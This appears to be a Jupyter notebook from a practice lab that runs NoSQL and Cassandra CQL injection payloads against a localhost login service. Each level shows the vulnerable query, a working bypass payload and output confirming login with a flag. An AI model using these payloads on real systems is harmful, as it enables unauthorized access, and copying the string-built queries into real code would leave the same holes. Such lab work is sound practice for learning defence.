In [2]:
import requests, json

## MONGODB - 1  

backend:  
```
const query = { $where: `this.username == '${username}' && this.password == '${password}'`  };
```
  
working payload:  `admin' || '1' == '1"`
  
final query:  
```
this.username == 'admin' || '1' == '1' && this.password == '${password}'
```

In [9]:
url = "http://localhost:3000/level1/login"

usernames = [
  r"admin' || this.username == 'admin",
  r"' || this.username == 'admin' || '",
]

headers = {
    "Content-Type": "application/json"
}
for username in usernames:
    payload = {
        "username": username,
        "password": "randompassword"
    }
    try:
        response = requests.post(url, json=payload, headers=headers)
        print(f"username used with random password: {username}")

        s = response.status_code
        print(json.dumps(response.json(), indent=2))

        print()
    except Exception as e:
        print(f"Error: {e}")

username used with random password: admin' || this.username == 'admin
{
  "success": true,
  "message": "Login successful",
  "secret": "FLAG{n0sql_byp455}"
}

username used with random password: ' || this.username == 'admin' || '
{
  "success": true,
  "message": "Login successful",
  "secret": "FLAG{n0sql_byp455}"
}



## MONGODB - 2
(slightly different from 1 for testing)

backend:  
```
const query = { $where: `(this.username == '${username}') && (this.password == '${password}')`  };
```
  
working payload:  `admin') || ('1' == '1`
  
final query:  
```
(this.username == 'admin' || '1' == '1') && (this.password == '${password})'
```

In [30]:
url = "http://localhost:3000/level2/login"

payloads = [
    {"username": r"admin') || ('1' == '1", "password": 'anything'},
]

headers = {
    "Content-Type": "application/json"
}
for payload in payloads:
    try:
        response = requests.post(url, json=payload, headers=headers)
        print(f"Payload: {json.dumps(payload)}")
        print(json.dumps(response.json(), indent=2), end='\n\n')
    except Exception as e:
        print(f"Error: {e}")

Payload: {"username": "admin') || ('1' == '1", "password": "anything"}
{
  "success": true,
  "message": "Login successful",
  "secret": "FLAG{n0sql_byp455}"
}



## MONGODB - 3   

taken from No SQL Injection challenge on PicoCTF  
https://play.picoctf.org/practice/challenge/443


In [29]:
url = "http://localhost:3000/level3/login"

payloads = [
{"username": r'admin', "password": r'{"$ne": "invalid"}'}
]

headers = {
    "Content-Type": "application/json"
}
for payload in payloads:
    try:
        response = requests.post(url, json=payload, headers=headers)
        print(f"Payload: {json.dumps(payload)}")
        print(json.dumps(response.json(), indent=2), end='\n\n')
    except Exception as e:
        print(f"Error: {e}")

Payload: {"username": "admin", "password": "{\"$ne\": \"invalid\"}"}
{
  "success": true,
  "message": "Login successful",
  "secret": "FLAG{n0sql_byp455}"
}



## MONGODB - 4


backend:  
```
const credentials = req.body;
User.find(credentials).then(...
```
  
working payload:  `{"username": "admin", "password": {"$ne": None}}`

In [4]:
url = "http://localhost:3000/level4/login"

payloads = [
    {"username": "admin", "password": {"$ne": None}},
    {"username": "admin", "password": {"$ne": "bar"}},
    {"username": "admin", "password": {"$gt": 0}},
    {"username": "admin", "password": ["$gt",""]},
    {"username": "admin", "password": {"$gt":""}}
]

headers = {
    "Content-Type": "application/json"
}
for payload in payloads:
    try:
        response = requests.post(url, json=payload, headers=headers)
        print(f"Payload: {json.dumps(payload)}")
        print(json.dumps(response.json(), indent=2), end='\n\n')
    except Exception as e:
        print(f"Error: {e}")

Payload: {"username": "admin", "password": {"$ne": null}}
{
  "success": true,
  "message": "Login successful",
  "secret": "FLAG{n0sql_byp455}"
}

Payload: {"username": "admin", "password": {"$ne": "bar"}}
{
  "success": true,
  "message": "Login successful",
  "secret": "FLAG{n0sql_byp455}"
}

Payload: {"username": "admin", "password": {"$gt": 0}}
{
  "success": true,
  "message": "Login successful",
  "secret": "FLAG{n0sql_byp455}"
}

Payload: {"username": "admin", "password": ["$gt", ""]}
{
  "success": false,
  "message": "Invalid credentials"
}

Payload: {"username": "admin", "password": {"$gt": ""}}
{
  "success": true,
  "message": "Login successful",
  "secret": "FLAG{n0sql_byp455}"
}



## CASSANDRA
  
backend:  
```
const query = `SELECT * FROM users WHERE username='${username}' AND password='${password}' ALLOW FILTERING`;
const result = await client.execute(query);
```
  
working payload:  `{"username": r"admin'/*", "password": r"*/ and password >'"}`

resulting query:
```
SELECT * FROM users WHERE username='admin'/*' AND password='*/ and password >'' ALLOW FILTERING;
```

reference: https://www.invicti.com/blog/web-security/investigating-cql-injection-apache-cassandra

In [5]:
url = "http://localhost:3000/level5/login"

payloads = [
    {"username": r"admin'/*", "password": r"*/ and password >'"}
]

headers = {
    "Content-Type": "application/json"
}
for payload in payloads:
    try:
        response = requests.post(url, json=payload, headers=headers)
        print(f"Payload: {json.dumps(payload)}")
        print(f"Status Code: {response.status_code}")
        print(json.dumps(response.json(), indent=2), end='\n\n')
    except Exception as e:
        print(f"Error: {e}")

Payload: {"username": "admin'/*", "password": "*/ and password >'"}
Status Code: 200
{
  "success": true,
  "message": "Login successful",
  "secret": "FLAG{n0sql_byp455}"
}

